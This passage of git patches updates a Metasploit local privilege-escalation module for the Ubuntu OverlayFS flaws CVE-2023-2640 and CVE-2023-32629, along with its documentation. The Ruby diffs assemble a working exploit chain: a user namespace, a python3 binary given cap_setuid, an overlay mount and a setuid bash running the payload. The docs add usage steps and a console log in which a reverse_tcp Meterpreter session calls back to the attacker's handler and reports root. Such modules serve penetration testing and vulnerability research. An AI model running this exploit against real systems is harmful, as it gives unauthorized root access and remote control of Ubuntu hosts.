bash_copy = '/var/tmp/' + Rex::Text.rand_text_alpha(rand(6..13)) + # bash_copy = '/var/tmp/bash' directories.each do |dir| print_status "Creating directory #{dir}" From 441a3215b233b329b46869d22f4627b04cca134c Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Tue, 19 Nov 2024 08:59:22 -0600 Subject: [PATCH 09/11] Catch up to head on other branch --- modules/exploits/linux/local/gameoverlay_privesc.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index 4cf02a618ada..63517e18f144 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb @@ -178,8 +178,6 @@ def exploit exploit_cmd << ' && ' unless target.arch.first == ARCH_CMD exploit_cmd << " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}\")'" - vprint_status(exploit_cmd.to_s) - output = cmd_exec(exploit_cmd) print_status(output) end From 59229ee61244145d6747dab9f1369134c6f869cb Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Tue, 17 Dec 2024 16:52:24 -0600 Subject: [PATCH 10/11] Update payload name, fix payload escapes & quotation, add unix cmd support --- .../linux/local/gameoverlay_privesc.rb | 28 ++++++++++--------- 1 file changed, 15 insertions(+), 13 deletions(-) diff --git a/modules/exploits/linux/local/gameoverlay_privesc.rb b/modules/exploits/linux/local/gameoverlay_privesc.rb index 63517e18f144..4172164bff0e 100644 --- a/modules/exploits/linux/local/gameoverlay_privesc.rb +++ b/modules/exploits/linux/local/gameoverlay_privesc.rb @@ -29,7 +29,7 @@ def initialize(info = {}) 'bwatters-r7', # MsF Module 'gardnerapp', # MsF Module ], - 'Platform' => ['linux'], + 'Platform' => ['linux', 'unix'], 'SessionTypes' => ['shell', 'meterpreter'], 'DisclosureDate' => '2023-07-26', 'References' => [ @@ -55,7 +55,7 @@ def initialize(info = {}) 'Arch' => ARCH_CMD, 'Payload' => { - 'BadChars' => "\x93\x94" + 'BadChars' => "\x22\x27" } } ] @@ -69,7 +69,7 @@ def initialize(info = {}) ) register_options [ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']), - OptString.new('PayloadFileName', [true, 'Name of payload', 'marv']), + OptString.new('PayloadFileName', [true, 'Name of payload', Rex::Text.rand_text_alpha(rand(8..12))]) ] end @@ -150,7 +150,7 @@ def exploit end if target.arch.first == ARCH_CMD - payload_cmd = "\\\"#{payload.encoded}\\\"" + payload_cmd = payload.encoded else pay_file = datastore['PayloadFilename'] payload_path = "#{pay_dir}#{pay_file}" @@ -164,22 +164,24 @@ def exploit # Exploit overlayfs vuln # Build the command + rmrf_cmd = " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}" exploit_cmd = 'unshare -rm sh -c "' exploit_cmd << "cp #{cmd_exec('which python3')} #{lower_dir}; " exploit_cmd << "setcap cap_setuid+eip #{lower_dir}python3; " exploit_cmd << "mount -t overlay overlay -o rw,lowerdir=#{lower_dir},upperdir=#{upper_dir},workdir=#{work_dir} #{merge_dir} && " - exploit_cmd << "touch #{merge_dir}*; \" && " + exploit_cmd << "touch #{merge_dir}*; " exploit_cmd << "#{upper_dir}python3 -c 'import os;os.setuid(0);os.system(" - exploit_cmd << "\"cp /bin/bash #{bash_copy} && chmod +x #{bash_copy} && " - exploit_cmd << "chmod +x #{payload_cmd} && " unless target.arch.first == ARCH_CMD - exploit_cmd << "#{bash_copy} -p -c " - exploit_cmd << payload_cmd - exploit_cmd << ' && ' unless target.arch.first == ARCH_CMD - exploit_cmd << " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}\")'" - + exploit_cmd << "\\\"cp /bin/bash #{bash_copy} && chmod +x #{bash_copy} && " + if target.arch.first == ARCH_CMD + payload_cmd.gsub!('\\\\\\', '\\\\\\\\') + exploit_cmd << "#{bash_copy} -p -c \\\\\\\"(#{payload_cmd}); #{rmrf_cmd}\\\\\\\"" + else + exploit_cmd << "chmod +x #{payload_cmd} && #{payload_cmd} & #{rmrf_cmd}" + end + exploit_cmd << "\\\")'\"" output = cmd_exec(exploit_cmd) - print_status(output) + vprint_status(output) end end From b7f477172f23372e9288a531111127750edcd97a Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Wed, 18 Dec 2024 14:08:10 -0600 Subject: [PATCH 11/11] Update docs to reflect recent changes --- .../linux/local/gameoverlay_privesc.md | 103 ++++++++++-------- 1 file changed, 56 insertions(+), 47 deletions(-) diff --git a/documentation/modules/exploit/linux/local/gameoverlay_privesc.md b/documentation/modules/exploit/linux/local/gameoverlay_privesc.md index 38f00adb4a51..0630406fe0ca 100644 --- a/documentation/modules/exploit/linux/local/gameoverlay_privesc.md +++ b/documentation/modules/exploit/linux/local/gameoverlay_privesc.md @@ -1,20 +1,20 @@ ## Description -CVE-2023-2640 and CVE-2023-32629 are vunerabilites that allow for the arbitrary setting of +CVE-2023-2640 and CVE-2023-32629 are vulnerabilities that allow for the arbitrary setting of capabilities while overlaying filesystems. On most Linux Kernels during the execution of `ovl_do_setxattr` an intermediate function `vfs_setxatrr` converts file capabilities in a -way that limits them to the current namesapce. However, on some versions of the Ubuntu kernel +way that limits them to the current namespace. However, on some versions of the Ubuntu kernel `_vfs_setxattr_noperm` is called directly without calling `vfs_setxattr`. When a new namespace is created the user will technically be "root" within that given -namespace. This module will take advantage of this by setting the `CAP_SETUID` capability +namespace. This module will take advantage of this by setting the `CAP_SETUID` capability on a system binary. It will then perform filesystem overlay, copying the binary into the lower -directory. Because of the flaws described above when the binary is transfered into the upper -directory it's capabilities will not be sanitized and persist in the "normal" namespace. +directory. Because of the flaws described above when the binary is transferred into the upper +directory its capabilities will not be sanitized and persist in the "normal" namespace. ## Vunerable Application -These vunerabilities are somewhat unique in that they effect a wide variety of Ubuntu releases +These vulnerabilities are somewhat unique in that they effect a wide variety of Ubuntu releases and kernel versions, as described in the list below. Ubuntu 23.04 (Lunar Lobster)m kernel 6.2.0, (CVE-2023-2640 & CVE-2023-32629) @@ -29,17 +29,17 @@ Ubuntu 20.04 LTS (Focal Fossa), kernel -> 5.4.0, (CVE-2023-32629) Ubuntu 18.04 LTS (Bionic Beaver), kernel -> 5.4.0, (CVE-2023-32629) -The user can download a vunerable version, for example: +The user can download a vulnerable version, for example: ``` sudo apt update sudo apt install -y linux-image-5.19.0-41-generic linux-headers-5.19.0-41-generic reboot ``` -While testing @bwatters7 mentioned taking the system Be sure to take the system offline to -prevent the vunerabilities from silently being patched. +While testing, @bwatters7 mentioned taking the system offline as this appears to be patched automatically. +Be sure to take the system offline to prevent the vulnerabilities from silently being patched. -This module has succesfully been tested on the following: +This module has successfully been tested on the following: Ubuntu 22.04 LTS (Jammy Jellyfish) 5.19.0-41-generic @@ -49,11 +49,11 @@ Ubuntu 20.04 LTS (Focal Fossa) 5.4.0-1018-aws 1). Start `msfconsole` -2). Get a session on a vunerable system +2). Get a session on a vulnerable system 3). Use `exploit/linux/local/gameoverlay_privesc` -4). Optional: choose target for payload, either system command (1) or payload (2) +4). Optional: choose target for payload, either linux binary (0) or [li|u]nix command (1) `set target 1` 5). Set session `set session [SESSION]` @@ -65,42 +65,38 @@ Ubuntu 20.04 LTS (Focal Fossa) 5.4.0-1018-aws ## Options ### Payload File Name -Name of the file storing the payload, default is `marv`. +Name of the file storing the payload, default is random. ### Writable Dir -The name of a directory with write permissions, defualt is `/tmp`. This will be where the -payload file will be created. Additionally during the exploit a series of directories will be +The name of a directory with write permissions, default is `/tmp`. This will be where the +payload file will be created if necessary. Additionally during the exploit a series of directories will be created here to perform the filesystem overlaying. ## Scenarios You have a non-root session on one of the systems described above. Please note that this -module will automatically run checks to determine if the system is vunerable, you can disable +module will automatically run checks to determine if the system is vulnerable, you can disable this with `set AutoCheck False`. ``` - > use exploit/linux/local/gameoverlay_privesc -[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp -msf6 exploit(linux/local/gameoverlay_privesc) > set session 1 -session => 1 -msf6 exploit(linux/local/gameoverlay_privesc) > set target 0 -target => 0 -msf6 exploit(linux/local/gameoverlay_privesc) > set payload linux/aarch64/meterpreter_reverse_tcp -payload => linux/aarch64/meterpreter_reverse_tcp -msf6 exploit(linux/local/gameoverlay_privesc) > set lhost 10.5.135.201 -lhost => 10.5.135.201 +msf6 exploit(linux/local/gameoverlay_privesc) > +[*] Sending stage (3045380 bytes) to 10.5.132.129 +[*] Meterpreter session 3 opened (10.5.135.201:4585 -> 10.5.132.129:33504) at 2024-12-18 14:02:15 -0600 + +msf6 exploit(linux/local/gameoverlay_privesc) > set session 3 +session => 3 msf6 exploit(linux/local/gameoverlay_privesc) > show options Module options (exploit/linux/local/gameoverlay_privesc): Name Current Setting Required Description ---- --------------- -------- ----------- - PayloadFileName pVmtuGOGXdO yes Name of payload - SESSION 1 yes The session to run this module on + PayloadFileName pSueaCXrnzH yes Name of payload + SESSION 3 yes The session to run this module on WritableDir /tmp yes A directory where we can write files -Payload options (linux/aarch64/meterpreter_reverse_tcp): +Payload options (linux/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- @@ -120,29 +116,42 @@ View the full module info with the info, or info -d command. msf6 exploit(linux/local/gameoverlay_privesc) > run -[*] Started reverse TCP handler on 10.5.135.201:4444 +[*] Started reverse TCP handler on 10.5.135.201:4444 [*] Running automatic check ("set AutoCheck false" to disable) [*] Detected Ubuntu version: Jammy Jellyfish [*] Detected kernel version: 5.19.0-41-generic [+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable -[*] Creating directory /tmp/UqNFkc/ -[*] Creating directory /tmp/UqNFkc/QKZiqWWsnSOz/ -[*] Creating directory /tmp/UqNFkc/WbrucZxIAlWZF/ -[*] Creating directory /tmp/UqNFkc/uKmqunqY/ -[*] Creating directory /tmp/UqNFkc/pwFUmC/ -[*] Writing payload: /tmp/UqNFkc/pVmtuGOGXdO -[*] Starting new namespace, and running exploit... -[+] Deleted /tmp/UqNFkc/ -[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.149:49168) at 2024-10-02 16:28:43 -0500 -[*] +[*] Creating directory to store payload: /tmp/ODBpneOXk/ +[*] Creating directory /tmp/ODBpneOXk/ +[*] /tmp/ODBpneOXk/ created +[*] Creating directory /tmp/ODBpneOXk/ +[*] Creating directory /tmp/ODBpneOXk/ +[*] /tmp/ODBpneOXk/ created +[*] Creating directory /tmp/ODBpneOXk/bmbtPAX/ +[*] Creating directory /tmp/ODBpneOXk/bmbtPAX/ +[*] /tmp/ODBpneOXk/bmbtPAX/ created +[*] Creating directory /tmp/ODBpneOXk/JtNbwLXJKw/ +[*] Creating directory /tmp/ODBpneOXk/JtNbwLXJKw/ +[*] /tmp/ODBpneOXk/JtNbwLXJKw/ created +[*] Creating directory /tmp/ODBpneOXk/hEhbByWL/ +[*] Creating directory /tmp/ODBpneOXk/hEhbByWL/ +[*] /tmp/ODBpneOXk/hEhbByWL/ created +[*] Creating directory /tmp/ODBpneOXk/yvvSFre/ +[*] Creating directory /tmp/ODBpneOXk/yvvSFre/ +[*] /tmp/ODBpneOXk/yvvSFre/ created +[*] Writing payload: /tmp/ODBpneOXk/pSueaCXrnzH +[*] Transmitting intermediate stager...(126 bytes) +[*] Sending stage (3045380 bytes) to 10.5.132.129 +[*] rm: cannot remove '/tmp/ODBpneOXk/yvvSFre/': Device or resource busy +[*] Meterpreter session 4 opened (10.5.135.201:4444 -> 10.5.132.129:44400) at 2024-12-18 14:02:42 -0600 -meterpreter > sysinfo -Computer : 10.5.132.149 -OS : Ubuntu 22.04 (Linux 5.19.0-41-generic) -Architecture : aarch64 -BuildTuple : aarch64-linux-musl -Meterpreter : aarch64/linux meterpreter > getuid Server username: root -meterpreter > +meterpreter > sysinfo +Computer : 10.5.132.129 +OS : Ubuntu 22.04 (Linux 5.19.0-41-generic) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux + ```